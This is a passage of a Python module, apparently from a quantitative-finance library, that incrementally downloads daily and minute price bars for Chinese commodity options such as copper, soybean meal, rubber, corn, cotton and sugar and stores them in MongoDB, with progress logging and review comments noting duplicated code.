            # codes follow the "M XXXXXX" format (first 8 chars used as key)
            ref = coll_option_commodity_m_day.find({'code': str(code)[0:8]})
            end_date = str(now_time())[0:10]
            # if data exists, continue with an incremental update; the guard
            # also avoids a negative-index problem for freshly listed
            # contracts that have no stored rows yet
            if ref.count() > 0:
                # resume from the last fetched date
                start_date = ref[ref.count() - 1]['date']
                QA_util_log_info(
                    ' 上次获取期权M豆粕日线数据的最后日期是 {}'.format(start_date),
                    ui_log=ui_log
                )
                QA_util_log_info(
                    'UPDATE_OPTION_M_DAY \n 从上一次下载数据开始继续 Trying update {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    # fetch from the day after the stored one to avoid a
                    # duplicate row for `start_date`
                    start_date0 = QA_util_get_next_day(start_date)
                    df0 = QA_fetch_get_option_day(
                        code=code,
                        start_date=start_date0,
                        end_date=end_date,
                        frequence='day',
                        ip=None,
                        port=None
                    )
                    retCount = df0.iloc[:, 0].size
                    QA_util_log_info(
                        "日期从开始{}-结束{} , 合约代码{} , 返回了{}条记录 , 准备写入数据库".format(
                            start_date0,
                            end_date,
                            code,
                            retCount
                        ),
                        ui_log=ui_log
                    )
                    coll_option_commodity_m_day.insert_many(
                        QA_util_to_json_from_pandas(df0)
                    )
                else:
                    QA_util_log_info(
                        "^已经获取过这天的数据了^ {}".format(start_date),
                        ui_log=ui_log
                    )
            else:
                # nothing stored yet: download the whole history
                start_date = '1990-01-01'
                QA_util_log_info(
                    'UPDATE_M_OPTION_DAY \n 从新开始下载数据 Trying update {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    df0 = QA_fetch_get_option_day(
                        code=code,
                        start_date=start_date,
                        end_date=end_date,
                        frequence='day',
                        ip=None,
                        port=None
                    )
                    retCount = df0.iloc[:, 0].size
                    QA_util_log_info(
                        "日期从开始{}-结束{} , 合约代码{} , 获取了{}条记录 , 准备写入数据库^_^ ".format(
                            start_date,
                            end_date,
                            code,
                            retCount
                        ),
                        ui_log=ui_log
                    )
                    coll_option_commodity_m_day.insert_many(
                        QA_util_to_json_from_pandas(df0)
                    )
                else:
                    QA_util_log_info(
                        "*已经获取过这天的数据了* {}".format(start_date),
                        ui_log=ui_log
                    )
        except Exception as error0:
            print(error0)
            err.append(str(code))

    # iterate all contracts, reporting progress before each save
    for item in range(len(option_m_contract_list)):
        QA_util_log_info(
            'The {} of Total {}'.format(item,
                                        len(option_m_contract_list)),
            ui_log=ui_log
        )
        strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(item / len(option_m_contract_list) * 100))[0:4] + '%'
        )
        intLogProgress = int(
            float(item / len(option_m_contract_list) * 10000.0)
        )
        QA_util_log_info(
            strLogProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intLogProgress
        )
        __saving_work(
            option_m_contract_list[item].code,
            coll_option_commodity_m_day
        )
    if len(err) < 1:
        QA_util_log_info('SUCCESS save option m day ^_^ ', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def _save_option_commodity_cu_day(
        client=DATABASE,
        ui_log=None,
        ui_progress=None
):
    """Incrementally save CU (copper) commodity-option daily bars to MongoDB.

    :param client: pymongo client holding the target database
    :param ui_log: optional UI logging hook forwarded to QA_util_log_info
    :param ui_progress: optional UI progress hook
    :return: None; failed contract codes are logged at the end
    """
    ##################### CU 铜 ############################################################################
    option_cu_contract_list = QA_fetch_get_commodity_option_CU_contract_time_to_market(
    )
    coll_option_commodity_cu_day = client.option_commodity_cu_day
    coll_option_commodity_cu_day.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    err = []  # contract codes whose download/insert failed

    def __saving_work(code, coll_option_commodity_cu_day):
        # Download daily bars for one contract and append only the new rows.
        try:
            QA_util_log_info(
                '##JOB12 Now Saving OPTION_DAY_COMMODITY_CU 铜 ==== {}'.format(
                    str(code)
                ),
                ui_log=ui_log
            )
            # First check whether the database already has rows for this code.
            # Option codes are numbered from 10000001 (e.g. up to 10001228).
            ref = coll_option_commodity_cu_day.find({'code': str(code)[0:8]})
            end_date = str(now_time())[0:10]
            # If rows exist, resume incrementally.  The count() guard also
            # avoids a negative index for freshly listed contracts that have
            # no stored rows yet.
            if ref.count() > 0:
                # Continue from the last stored trade date.
                start_date = ref[ref.count() - 1]['date']
                QA_util_log_info(
                    ' 上次获取期权CU日线数据的最后日期是 {}'.format(start_date),
                    ui_log=ui_log
                )
                QA_util_log_info(
                    'UPDATE_OPTION_CU_DAY \n 从上一次下载数据开始继续 Trying update {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    # Fetch strictly after the stored date to avoid duplicates.
                    start_date0 = QA_util_get_next_day(start_date)
                    df0 = QA_fetch_get_option_day(
                        code=code,
                        start_date=start_date0,
                        end_date=end_date,
                        frequence='day',
                        ip=None,
                        port=None
                    )
                    retCount = df0.iloc[:, 0].size
                    QA_util_log_info(
                        "日期从开始{}-结束{} , 合约代码{} , 返回了{}条记录 , 准备写入数据库".format(
                            start_date0,
                            end_date,
                            code,
                            retCount
                        ),
                        ui_log=ui_log
                    )
                    coll_option_commodity_cu_day.insert_many(
                        QA_util_to_json_from_pandas(df0)
                    )
                else:
                    QA_util_log_info(
                        "^已经获取过这天的数据了^ {}".format(start_date),
                        ui_log=ui_log
                    )
            else:
                # No stored rows yet: download the full history from scratch.
                start_date = '1990-01-01'
                QA_util_log_info(
                    'UPDATE_CU_OPTION_DAY \n 从新开始下载数据 Trying update {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    df0 = QA_fetch_get_option_day(
                        code=code,
                        start_date=start_date,
                        end_date=end_date,
                        frequence='day',
                        ip=None,
                        port=None
                    )
                    retCount = df0.iloc[:, 0].size
                    QA_util_log_info(
                        "日期从开始{}-结束{} , 合约代码{} , 获取了{}条记录 , 准备写入数据库^_^ ".format(
                            start_date,
                            end_date,
                            code,
                            retCount
                        ),
                        ui_log=ui_log
                    )
                    coll_option_commodity_cu_day.insert_many(
                        QA_util_to_json_from_pandas(df0)
                    )
                else:
                    QA_util_log_info(
                        "*已经获取过这天的数据了* {}".format(start_date),
                        ui_log=ui_log
                    )
        except Exception as error0:
            # Record the failing code and continue with the next contract.
            print(error0)
            err.append(str(code))

    # Sequentially process every CU contract, reporting progress to the UI.
    for item in range(len(option_cu_contract_list)):
        QA_util_log_info(
            'The {} of Total {}'.format(item,
                                        len(option_cu_contract_list)),
            ui_log=ui_log
        )
        strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(item / len(option_cu_contract_list) * 100))[0:4] + '%'
        )
        intLogProgress = int(
            float(item / len(option_cu_contract_list) * 10000.0)
        )
        QA_util_log_info(
            strLogProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intLogProgress
        )
        __saving_work(
            option_cu_contract_list[item].code,
            coll_option_commodity_cu_day
        )
    if len(err) < 1:
        QA_util_log_info('SUCCESS save option cu day ^_^ ', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_option_commodity_day(
        client=DATABASE,
        ui_log=None,
        ui_progress=None
):
    '''Save daily bars for every supported commodity-option family.

    Delegates to the per-family savers in the original order:
    CU, M, SR, RU, CF, C.

    :param client: pymongo client holding the target database
    :param ui_log: optional UI logging hook
    :param ui_progress: optional UI progress hook
    :return: None
    '''
    family_savers = (
        _save_option_commodity_cu_day,
        _save_option_commodity_m_day,
        _save_option_commodity_sr_day,
        _save_option_commodity_ru_day,
        _save_option_commodity_cf_day,
        _save_option_commodity_c_day,
    )
    for save_family in family_savers:
        save_family(
            client=client,
            ui_log=ui_log,
            ui_progress=ui_progress
        )
'''
期权分钟线 (option minute-bar savers)
TODO: refactor — the per-commodity functions below are near-identical
copies and should be merged into a single parameterised implementation.
'''
def _save_option_commodity_ru_min(
        client=DATABASE,
        ui_log=None,
        ui_progress=None
):
    '''Incrementally save RU (natural rubber) commodity-option minute bars.

    Fixes applied here: this copy used to fetch the C (corn) contract list
    instead of the RU list, and its first log line mislabelled RU as 棉花
    (cotton).  NOTE(review): this definition is shadowed by a later function
    of the same name in this module, so at import time the later one wins.

    :param client: pymongo client holding the target database
    :param ui_log: optional UI logging hook
    :param ui_progress: optional UI progress hook
    :return: None
    '''
    # Bug fix: fetch the RU contract list (was the C corn list).
    option_contract_list = QA_fetch_get_commodity_option_RU_contract_time_to_market()
    coll_option_min = client.option_commodity_ru_min
    coll_option_min.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    err = []  # contract codes whose download/insert failed

    def __saving_work(code, coll):
        # Download all five minute frequencies for one contract code.
        QA_util_log_info(
            '##JOB13 Now Saving Option RU 天然橡胶 MIN ==== {}'.format(str(code)),
            ui_log=ui_log
        )
        try:
            for type in ['1min', '5min', '15min', '30min', '60min']:
                ref_ = coll.find({'code': str(code)[0:8], 'type': type})
                end_time = str(now_time())[0:19]
                if ref_.count() > 0:
                    # Resume from the last stored datetime for this frequency.
                    start_time = ref_[ref_.count() - 1]['datetime']
                    QA_util_log_info(
                        '##JOB13.{} Now Saving Option RU 天然橡胶 {} from {} to {} =={} '
                        .format(
                            ['1min',
                             '5min',
                             '15min',
                             '30min',
                             '60min'].index(type),
                            str(code),
                            start_time,
                            end_time,
                            type
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_future_min(
                            str(code),
                            start_time,
                            end_time,
                            type
                        )
                        if len(__data) > 1:
                            QA_util_log_info(
                                " 写入 新增历史合约记录数 {} ".format(len(__data))
                            )
                            # Drop the first fetched row — it presumably
                            # overlaps the last stored bar (TODO confirm).
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data[1::])
                            )
                else:
                    # No stored rows yet: fetch from a fixed initial date.
                    start_time = '2015-01-01'
                    QA_util_log_info(
                        '##JOB13.{} Now Option RU 天然橡胶 {} from {} to {} =={} '
                        .format(
                            ['1min',
                             '5min',
                             '15min',
                             '30min',
                             '60min'].index(type),
                            str(code),
                            start_time,
                            end_time,
                            type
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_future_min(
                            str(code),
                            start_time,
                            end_time,
                            type
                        )
                        if len(__data) > 1:
                            QA_util_log_info(
                                " 写入 新增合约记录数 {} ".format(len(__data))
                            )
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data)
                            )
        except Exception:
            # Record the failing contract; keep the other workers going.
            err.append(code)

    # Fan the per-contract work out over a small thread pool (network I/O).
    executor = ThreadPoolExecutor(max_workers=4)
    res = {
        executor.submit(
            __saving_work,
            option_contract_list[i_]["code"],
            coll_option_min
        )
        for i_ in range(len(option_contract_list))
    }
    count = 0
    for i_ in concurrent.futures.as_completed(res):
        QA_util_log_info(
            'The {} of Total {}'.format(count,
                                        len(option_contract_list)),
            ui_log=ui_log
        )
        strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(count / len(option_contract_list) * 100))[0:4] + '%'
        )
        intLogProgress = int(float(count / len(option_contract_list) * 10000.0))
        QA_util_log_info(
            strLogProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intLogProgress
        )
        count = count + 1
    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def _save_option_commodity_c_min(
        client=DATABASE,
        ui_log=None,
        ui_progress=None
):
    '''Incrementally save C (corn) commodity-option minute bars to MongoDB.

    :param client: pymongo client holding the target database
    :param ui_log: optional UI logging hook
    :param ui_progress: optional UI progress hook
    :return: None
    '''
    option_contract_list = QA_fetch_get_commodity_option_C_contract_time_to_market()
    coll_option_min = client.option_commodity_c_min
    coll_option_min.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    err = []
    # index: code
    err = []  # NOTE(review): duplicate initialisation, redundant — kept as-is

    def __saving_work(code, coll):
        # Download all five minute frequencies for one contract code.
        QA_util_log_info(
            '##JOB13 Now Saving Option C 玉米 MIN ==== {}'.format(str(code)),
            ui_log=ui_log
        )
        try:
            for type in ['1min', '5min', '15min', '30min', '60min']:
                ref_ = coll.find({'code': str(code)[0:8], 'type': type})
                end_time = str(now_time())[0:19]
                if ref_.count() > 0:
                    # Resume from the last stored datetime for this frequency.
                    start_time = ref_[ref_.count() - 1]['datetime']
                    QA_util_log_info(
                        '##JOB13.{} Now Saving Option C 玉米 {} from {} to {} =={} '
                        .format(
                            ['1min',
                             '5min',
                             '15min',
                             '30min',
                             '60min'].index(type),
                            str(code),
                            start_time,
                            end_time,
                            type
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_future_min(
                            str(code),
                            start_time,
                            end_time,
                            type
                        )
                        if len(__data) > 1:
                            QA_util_log_info(
                                " 写入 新增历史合约记录数 {} ".format(len(__data))
                            )
                            # Drop the first fetched row — presumably overlaps
                            # the last stored bar (TODO confirm).
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data[1::])
                            )
                else:
                    # No stored rows yet: fetch from a fixed initial date.
                    start_time = '2015-01-01'
                    QA_util_log_info(
                        '##JOB13.{} Now Option C 玉米 {} from {} to {} =={} '
                        .format(
                            ['1min',
                             '5min',
                             '15min',
                             '30min',
                             '60min'].index(type),
                            str(code),
                            start_time,
                            end_time,
                            type
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_future_min(
                            str(code),
                            start_time,
                            end_time,
                            type
                        )
                        if len(__data) > 1:
                            QA_util_log_info(
                                " 写入 新增合约记录数 {} ".format(len(__data))
                            )
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data)
                            )
        except:
            # Bare except keeps one failing contract from aborting the pool;
            # the code is recorded and reported at the end.
            err.append(code)

    # Fan the per-contract work out over a small thread pool (network I/O).
    executor = ThreadPoolExecutor(max_workers=4)
    res = {
        executor.submit(
            __saving_work,
            option_contract_list[i_]["code"],
            coll_option_min
        )
        for i_ in range(len(option_contract_list))
    }  # multi index ./.
    count = 0
    for i_ in concurrent.futures.as_completed(res):
        QA_util_log_info(
            'The {} of Total {}'.format(count,
                                        len(option_contract_list)),
            ui_log=ui_log
        )
        strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(count / len(option_contract_list) * 100))[0:4] + '%'
        )
        intLogProgress = int(float(count / len(option_contract_list) * 10000.0))
        QA_util_log_info(
            strLogProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intLogProgress
        )
        count = count + 1
    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
    pass
def _save_option_commodity_cf_min(
        client=DATABASE,
        ui_log=None,
        ui_progress=None
):
    '''Incrementally save CF (cotton) commodity-option minute bars to MongoDB.

    :param client: pymongo client holding the target database
    :param ui_log: optional UI logging hook
    :param ui_progress: optional UI progress hook
    :return: None
    '''
    option_contract_list = QA_fetch_get_commodity_option_CF_contract_time_to_market()
    coll_option_min = client.option_commodity_cf_min
    coll_option_min.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    err = []
    # index: code
    err = []  # NOTE(review): duplicate initialisation, redundant — kept as-is

    def __saving_work(code, coll):
        # Download all five minute frequencies for one contract code.
        QA_util_log_info(
            '##JOB13 Now Saving Option CF 棉花 MIN ==== {}'.format(str(code)),
            ui_log=ui_log
        )
        try:
            for type in ['1min', '5min', '15min', '30min', '60min']:
                ref_ = coll.find({'code': str(code)[0:8], 'type': type})
                end_time = str(now_time())[0:19]
                if ref_.count() > 0:
                    # Resume from the last stored datetime for this frequency.
                    start_time = ref_[ref_.count() - 1]['datetime']
                    QA_util_log_info(
                        '##JOB13.{} Now Saving Option CF 棉花 {} from {} to {} =={} '
                        .format(
                            ['1min',
                             '5min',
                             '15min',
                             '30min',
                             '60min'].index(type),
                            str(code),
                            start_time,
                            end_time,
                            type
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_future_min(
                            str(code),
                            start_time,
                            end_time,
                            type
                        )
                        if len(__data) > 1:
                            QA_util_log_info(
                                " 写入 新增历史合约记录数 {} ".format(len(__data))
                            )
                            # Drop the first fetched row — presumably overlaps
                            # the last stored bar (TODO confirm).
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data[1::])
                            )
                else:
                    # No stored rows yet: fetch from a fixed initial date.
                    start_time = '2015-01-01'
                    QA_util_log_info(
                        '##JOB13.{} Now Option CF 棉花 {} from {} to {} =={} '
                        .format(
                            ['1min',
                             '5min',
                             '15min',
                             '30min',
                             '60min'].index(type),
                            str(code),
                            start_time,
                            end_time,
                            type
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_future_min(
                            str(code),
                            start_time,
                            end_time,
                            type
                        )
                        if len(__data) > 1:
                            QA_util_log_info(
                                " 写入 新增合约记录数 {} ".format(len(__data))
                            )
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data)
                            )
        except:
            # Bare except keeps one failing contract from aborting the pool;
            # the code is recorded and reported at the end.
            err.append(code)

    # Fan the per-contract work out over a small thread pool (network I/O).
    executor = ThreadPoolExecutor(max_workers=4)
    res = {
        executor.submit(
            __saving_work,
            option_contract_list[i_]["code"],
            coll_option_min
        )
        for i_ in range(len(option_contract_list))
    }  # multi index ./.
    count = 0
    for i_ in concurrent.futures.as_completed(res):
        QA_util_log_info(
            'The {} of Total {}'.format(count,
                                        len(option_contract_list)),
            ui_log=ui_log
        )
        strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(count / len(option_contract_list) * 100))[0:4] + '%'
        )
        intLogProgress = int(float(count / len(option_contract_list) * 10000.0))
        QA_util_log_info(
            strLogProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intLogProgress
        )
        count = count + 1
    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
    pass
def _save_option_commodity_ru_min(
        client=DATABASE,
        ui_log=None,
        ui_progress=None
):
    '''Incrementally save RU (natural rubber) commodity-option minute bars.

    NOTE(review): this redefines an earlier function of the same name in
    this module; at import time this definition wins.

    :param client: pymongo client holding the target database
    :param ui_log: optional UI logging hook
    :param ui_progress: optional UI progress hook
    :return: None
    '''
    option_contract_list = QA_fetch_get_commodity_option_RU_contract_time_to_market(
    )
    coll_option_min = client.option_commodity_ru_min
    coll_option_min.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    err = []
    # index: code
    err = []  # NOTE(review): duplicate initialisation, redundant — kept as-is

    def __saving_work(code, coll):
        # Download all five minute frequencies for one contract code.
        QA_util_log_info(
            '##JOB13 Now Saving Option RU 天然橡胶 MIN ==== {}'.format(str(code)),
            ui_log=ui_log
        )
        try:
            for type in ['1min', '5min', '15min', '30min', '60min']:
                ref_ = coll.find({'code': str(code)[0:8], 'type': type})
                end_time = str(now_time())[0:19]
                if ref_.count() > 0:
                    # Resume from the last stored datetime for this frequency.
                    start_time = ref_[ref_.count() - 1]['datetime']
                    QA_util_log_info(
                        '##JOB13.{} Now Saving Option RU 天然橡胶 {} from {} to {} =={} '
                        .format(
                            ['1min',
                             '5min',
                             '15min',
                             '30min',
                             '60min'].index(type),
                            str(code),
                            start_time,
                            end_time,
                            type
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_future_min(
                            str(code),
                            start_time,
                            end_time,
                            type
                        )
                        if len(__data) > 1:
                            QA_util_log_info(
                                " 写入 新增历史合约记录数 {} ".format(len(__data))
                            )
                            # Drop the first fetched row — presumably overlaps
                            # the last stored bar (TODO confirm).
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data[1::])
                            )
                else:
                    # No stored rows yet: fetch from a fixed initial date.
                    start_time = '2015-01-01'
                    QA_util_log_info(
                        '##JOB13.{} Now Option RU 天然橡胶 {} from {} to {} =={} '
                        .format(
                            ['1min',
                             '5min',
                             '15min',
                             '30min',
                             '60min'].index(type),
                            str(code),
                            start_time,
                            end_time,
                            type
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_future_min(
                            str(code),
                            start_time,
                            end_time,
                            type
                        )
                        if len(__data) > 1:
                            QA_util_log_info(
                                " 写入 新增合约记录数 {} ".format(len(__data))
                            )
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data)
                            )
        except:
            # Bare except keeps one failing contract from aborting the pool;
            # the code is recorded and reported at the end.
            err.append(code)

    # Fan the per-contract work out over a small thread pool (network I/O).
    executor = ThreadPoolExecutor(max_workers=4)
    res = {
        executor.submit(
            __saving_work,
            option_contract_list[i_]["code"],
            coll_option_min
        )
        for i_ in range(len(option_contract_list))
    }  # multi index ./.
    count = 0
    for i_ in concurrent.futures.as_completed(res):
        QA_util_log_info(
            'The {} of Total {}'.format(count,
                                        len(option_contract_list)),
            ui_log=ui_log
        )
        strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(count / len(option_contract_list) * 100))[0:4] + '%'
        )
        intLogProgress = int(float(count / len(option_contract_list) * 10000.0))
        QA_util_log_info(
            strLogProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intLogProgress
        )
        count = count + 1
    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
    pass
def _save_option_commodity_cu_min(
        client=DATABASE,
        ui_log=None,
        ui_progress=None
):
    '''Incrementally save CU (copper) commodity-option minute bars to MongoDB.

    :param client: pymongo client holding the target database
    :param ui_log: optional UI logging hook
    :param ui_progress: optional UI progress hook
    :return: None
    '''
    option_contract_list = QA_fetch_get_commodity_option_CU_contract_time_to_market(
    )
    coll_option_min = client.option_commodity_cu_min
    coll_option_min.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    err = []
    # index: code
    err = []  # NOTE(review): duplicate initialisation, redundant — kept as-is

    def __saving_work(code, coll):
        # Download all five minute frequencies for one contract code.
        QA_util_log_info(
            '##JOB13 Now Saving Option CU 铜 MIN ==== {}'.format(str(code)),
            ui_log=ui_log
        )
        try:
            for type in ['1min', '5min', '15min', '30min', '60min']:
                ref_ = coll.find({'code': str(code)[0:8], 'type': type})
                end_time = str(now_time())[0:19]
                if ref_.count() > 0:
                    # Resume from the last stored datetime for this frequency.
                    start_time = ref_[ref_.count() - 1]['datetime']
                    QA_util_log_info(
                        '##JOB13.{} Now Saving Option CU 铜 {} from {} to {} =={} '
                        .format(
                            ['1min',
                             '5min',
                             '15min',
                             '30min',
                             '60min'].index(type),
                            str(code),
                            start_time,
                            end_time,
                            type
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_future_min(
                            str(code),
                            start_time,
                            end_time,
                            type
                        )
                        if len(__data) > 1:
                            QA_util_log_info(
                                " 写入 新增历史合约记录数 {} ".format(len(__data))
                            )
                            # Drop the first fetched row — presumably overlaps
                            # the last stored bar (TODO confirm).
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data[1::])
                            )
                else:
                    # No stored rows yet: fetch from a fixed initial date.
                    start_time = '2015-01-01'
                    QA_util_log_info(
                        '##JOB13.{} Now Option CU 铜 {} from {} to {} =={} '
                        .format(
                            ['1min',
                             '5min',
                             '15min',
                             '30min',
                             '60min'].index(type),
                            str(code),
                            start_time,
                            end_time,
                            type
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_future_min(
                            str(code),
                            start_time,
                            end_time,
                            type
                        )
                        if len(__data) > 1:
                            QA_util_log_info(
                                " 写入 新增合约记录数 {} ".format(len(__data))
                            )
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data)
                            )
        except:
            # Bare except keeps one failing contract from aborting the pool;
            # the code is recorded and reported at the end.
            err.append(code)

    # Fan the per-contract work out over a small thread pool (network I/O).
    executor = ThreadPoolExecutor(max_workers=4)
    res = {
        executor.submit(
            __saving_work,
            option_contract_list[i_]["code"],
            coll_option_min
        )
        for i_ in range(len(option_contract_list))
    }  # multi index ./.
    count = 0
    for i_ in concurrent.futures.as_completed(res):
        QA_util_log_info(
            'The {} of Total {}'.format(count,
                                        len(option_contract_list)),
            ui_log=ui_log
        )
        strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(count / len(option_contract_list) * 100))[0:4] + '%'
        )
        intLogProgress = int(float(count / len(option_contract_list) * 10000.0))
        QA_util_log_info(
            strLogProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intLogProgress
        )
        count = count + 1
    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
    pass
def _save_option_commodity_sr_min(
        client=DATABASE,
        ui_log=None,
        ui_progress=None
):
    '''Incrementally save SR (white sugar) commodity-option minute bars.

    :param client: pymongo client holding the target database
    :param ui_log: optional UI logging hook
    :param ui_progress: optional UI progress hook
    :return: None
    '''
    option_contract_list = QA_fetch_get_commodity_option_SR_contract_time_to_market(
    )
    coll_option_min = client.option_commodity_sr_min
    coll_option_min.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    err = []
    # index: code
    err = []  # NOTE(review): duplicate initialisation, redundant — kept as-is

    def __saving_work(code, coll):
        # Download all five minute frequencies for one contract code.
        QA_util_log_info(
            '##JOB13 Now Saving Option SR 白糖 ==== {}'.format(str(code)),
            ui_log=ui_log
        )
        try:
            for type in ['1min', '5min', '15min', '30min', '60min']:
                ref_ = coll.find({'code': str(code)[0:8], 'type': type})
                end_time = str(now_time())[0:19]
                if ref_.count() > 0:
                    # Resume from the last stored datetime for this frequency.
                    start_time = ref_[ref_.count() - 1]['datetime']
                    QA_util_log_info(
                        '##JOB13.{} Now Saving Option SR 白糖 {} from {} to {} =={} '
                        .format(
                            ['1min',
                             '5min',
                             '15min',
                             '30min',
                             '60min'].index(type),
                            str(code),
                            start_time,
                            end_time,
                            type
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_future_min(
                            str(code),
                            start_time,
                            end_time,
                            type
                        )
                        if len(__data) > 1:
                            QA_util_log_info(
                                " 写入 新增历史合约记录数 {} ".format(len(__data))
                            )
                            # Drop the first fetched row — presumably overlaps
                            # the last stored bar (TODO confirm).
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data[1::])
                            )
                else:
                    # No stored rows yet: fetch from a fixed initial date.
                    start_time = '2015-01-01'
                    QA_util_log_info(
                        '##JOB13.{} Now Option SR 白糖 {} from {} to {} =={} '
                        .format(
                            ['1min',
                             '5min',
                             '15min',
                             '30min',
                             '60min'].index(type),
                            str(code),
                            start_time,
                            end_time,
                            type
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_future_min(
                            str(code),
                            start_time,
                            end_time,
                            type
                        )
                        if len(__data) > 1:
                            QA_util_log_info(
                                " 写入 新增合约记录数 {} ".format(len(__data))
                            )
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data)
                            )
        except:
            # Bare except keeps one failing contract from aborting the pool;
            # the code is recorded and reported at the end.
            err.append(code)

    # Fan the per-contract work out over a small thread pool (network I/O).
    executor = ThreadPoolExecutor(max_workers=4)
    res = {
        executor.submit(
            __saving_work,
            option_contract_list[i_]["code"],
            coll_option_min
        )
        for i_ in range(len(option_contract_list))
    }  # multi index ./.
    count = 0
    for i_ in concurrent.futures.as_completed(res):
        QA_util_log_info(
            'The {} of Total {}'.format(count,
                                        len(option_contract_list)),
            ui_log=ui_log
        )
        strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(count / len(option_contract_list) * 100))[0:4] + '%'
        )
        intLogProgress = int(float(count / len(option_contract_list) * 10000.0))
        QA_util_log_info(
            strLogProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intLogProgress
        )
        count = count + 1
    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
    pass
def _save_option_commodity_m_min(
        client=DATABASE,
        ui_log=None,
        ui_progress=None
):
    '''Incrementally save M (soybean meal) commodity-option minute bars.

    :param client: pymongo client holding the target database
    :param ui_log: optional UI logging hook
    :param ui_progress: optional UI progress hook
    :return: None
    '''
    option_contract_list = QA_fetch_get_commodity_option_M_contract_time_to_market(
    )
    coll_option_min = client.option_commodity_m_min
    coll_option_min.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    err = []
    # index: code
